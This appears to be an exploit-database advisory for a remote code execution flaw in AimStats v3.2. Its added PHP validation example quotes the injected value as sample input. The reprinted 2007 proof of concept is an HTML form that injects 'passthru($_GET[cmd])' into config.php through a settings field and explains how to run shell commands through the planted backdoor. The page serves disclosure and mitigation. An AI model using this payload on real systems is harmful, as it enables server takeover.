Vendor: AimStats
By: Dj7xpl
CVSS: 7.5 (HIGH)
Remote Code Execution
CWE: Unknown
Product Name: AimStats
Affected Version From: AimStats v3.2
Affected Version To: AimStats v3.2
Patch Exists: Unknown
Related CWE:
CPE: a:aimstats:aimstats:3.2
Metasploit:
Other Scripts:
Platforms Tested: Unknown

AimStats v3.2 Remote Code Execution

This exploit allows an attacker to execute arbitrary code remotely in AimStats v3.2. The vulnerability can be exploited by sending specially crafted requests to the vulnerable server. This can lead to unauthorized access and control over the affected system.

Mitigation:

Update to a patched version of AimStats that addresses the remote code execution vulnerability. Apply security best practices such as input validation and sanitization to prevent similar vulnerabilities.
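
The input validation named in the mitigation, as an added example that is not AimStats code or part of the original advisory. It assumes, based on the proof of concept on this page, that the settings handler stores the posted `taglinelimit` and `number` fields in `config.php`; the function names and allowed ranges are hypothetical.

```php
<?php
declare(strict_types=1);
// Added example: a hypothetical hardened settings writer, not AimStats source code.

/** Return $raw as an int only if it is a plain integer string inside [$min, $max]. */
function parse_int_setting(mixed $raw, int $min, int $max): ?int
{
    if (!is_string($raw)) {
        return null; // arrays (number[]=...) and missing fields are rejected
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $value === false ? null : $value;
}

/** Render config.php from validated integers; nothing from the request is pasted in raw. */
function render_config(array $settings): string
{
    $out = "<?php\n";
    foreach ($settings as $name => $value) {
        if (!is_int($value) || !preg_match('/^[a-z_][a-z0-9_]*$/i', (string) $name)) {
            throw new InvalidArgumentException('refusing to write setting ' . $name);
        }
        $out .= '$' . $name . ' = ' . var_export($value, true) . ";\n";
    }
    return $out;
}

// Allowed ranges are assumptions for this example.
const LIMITS = ['taglinelimit' => [0, 10000], 'number' => [1, 1000]];

// Constructed sample requests: a normal update, then the PoC's "number" value.
$samples = [
    ['taglinelimit' => '777', 'number' => '11'],
    ['taglinelimit' => '777', 'number' => '11; passthru($_GET[cmd]);//;'],
];

foreach ($samples as $post) {
    $clean = [];
    foreach (LIMITS as $field => [$min, $max]) {
        $clean[$field] = parse_int_setting($post[$field] ?? null, $min, $max);
    }
    if (in_array(null, $clean, true)) {
        echo "rejected: settings must be integers in range\n";
        continue;
    }
    echo render_config($clean); // a real handler would write this atomically to config.php
}
```

The settings update endpoint should also require an authenticated administrator session, and storing settings in a non-executable format such as JSON removes the code-injection sink entirely.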
Source

Exploit-DB raw data:

<!--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+                                               Y! Underground Group                                               +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Portal......:  AimStats v3.2                                                                            +
+          Author......:  Dj7xpl / Dj7xpl@Yahoo.com                                                                +
+          Type........:  Remote Code Execution                                                                    +
+          Download....:  http://www.x-pose.org/aimstats.php                                                       +
+          Page........:  http://Dj7xpl.2600.ir                                                                    +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+                                                                                                                  +
+          Xpl.........:                                                                                           + -->
<html><head><Title>---===AimStats v3.2===------===Dj7xpl===---</title></head>
<body bgcolor="red">
<center>
<form name="AimStats" method="post" action="http://site.com/path to aimstats/process.php?update=yes">
<input name="taglinelimit" value="777" type="hidden" >
<input name="number" value="11; passthru($_GET[cmd]);//;" type="hidden" >
<input type="submit" name="Submit" value="Submit" >
</form><br><br>
<font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>
<font color="#C0FF3E" size="+1"> And See Backdoor into http://[Target]/[Path]/config.php?cmd=shell</font><br>
<font color="#C0FF3E" size="+1"> E.g  :  http://site.com/aimstats/config.php?cmd=ls -la</font>
</center>
</body>
</html>
<!--
+                                                                                                                  +
+                                                                                                                  +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -->

# milw0rm.com [2007-04-18]